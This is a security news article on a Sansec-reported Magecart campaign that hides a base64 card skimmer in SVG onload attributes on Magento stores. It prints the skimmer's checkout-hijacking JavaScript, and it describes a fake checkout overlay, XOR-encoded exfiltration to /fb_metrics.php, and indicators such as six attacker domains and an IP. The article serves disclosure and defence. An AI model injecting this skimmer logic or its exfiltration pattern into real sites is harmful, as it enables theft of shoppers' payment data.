Attackers Deploy Hidden Magecart Skimmer on Magento Using SVG onload Abuse

Security researchers at Sansec uncovered a large-scale Magecart campaign targeting Magento e-commerce platforms.

Nearly 100 online stores were infected with a sophisticated credit card skimmer. To evade security scanners and steal shopper payment data seamlessly, attackers concealed the malicious payload inside an invisible SVG image element.

Threat intelligence suggests the attackers likely breached the sites using the PolyShell vulnerability, an exploit that continues to plague unpatched Magento environments.

The SVG Injection Technique

Instead of loading external scripts, which are frequently flagged by security tools, the threat actors embed a 1×1 pixel SVG image directly into the store’s HTML.

The entire skimmer payload is base64-encoded and executed inline through the SVG’s onload event handler.

Here is the exact injection method:

xml{setTimeout(atob('KGZ1bmN0aW9uKCl7IGlm...'),1)})()"/>

By keeping the malware fully inline and encoded within a single string attribute, the attackers successfully bypass traditional monitoring that looks for malicious external script references.

Once injected, the skimmer patiently waits for a shopper to click any checkout button. It intercepts the user’s action using a useCapture event listener, prioritizing its own execution before the store’s legitimate handlers.

The shopper is then shown a highly convincing, full-screen “Secure Checkout” overlay that features realistic card validation and billing fields. The malware intercepts the navigation using the following JavaScript payload:

javascriptdocument.addEventListener(
  "click",
  function (e) {
    var el = e.target.closest('a,button,[role="button"]');
    if (!el) return;
    var href = el.getAttribute("href") || "";
    if (
      (href && checkoutUrl.includes(href)) ||
      el.getAttribute("data-role") === "proceed-to-checkout" ||
      el.id === "top-cart-btn-checkout"
    ) {
      e.preventDefault();
      e.stopImmediatePropagation();
      show(); // display fake checkout overlay
    }
  },
  true,
);

After the victim submits their payment details, the malware encrypts the stolen data using an XOR cipher with the key "script", followed by base64 encoding.

The harvested information is sent to one of six attacker-controlled domains, cleverly disguised to look like legitimate Facebook analytics traffic (/fb_metrics.php). To ensure maximum stealth, the skimmer double-encodes the destination URLs.

According to Sansec, once the data is successfully exfiltrated, the malware sets a browser storage flag (localStorage.setItem('_mgx_cv', '1')) to avoid targeting the same shopper twice.

Finally, the victim is silently redirected to the real checkout page, leaving them completely unaware that their payment data was compromised.

Indicators of Compromise

Exfiltration domains

All six domains resolve to 23.137.249.67, hosted at IncogNet LLC (AS40663) in the Netherlands.

Domain Confirmed victims
statistics-for-you.com 15
statistics-renew.com 14
morningflexpleasure.com 14
reusable-flex.com 12
goingfatter.com 11
wellfacing.com 10

Technical indicators

Indicator Value
Injection method
Data encoding base64 via atob(), executed via setTimeout
Exfil endpoint /fb_metrics.php
Exfil method fetch() POST no-cors, fallback hidden iframe
localStorage key _mgx_cv
Campaign marker {site:'rand0m'} in payload array
Exfil server 23.137.249.67 (IncogNet LLC, AS40663, NL)

Related Articles

Back to top button
lxghq xHdoPs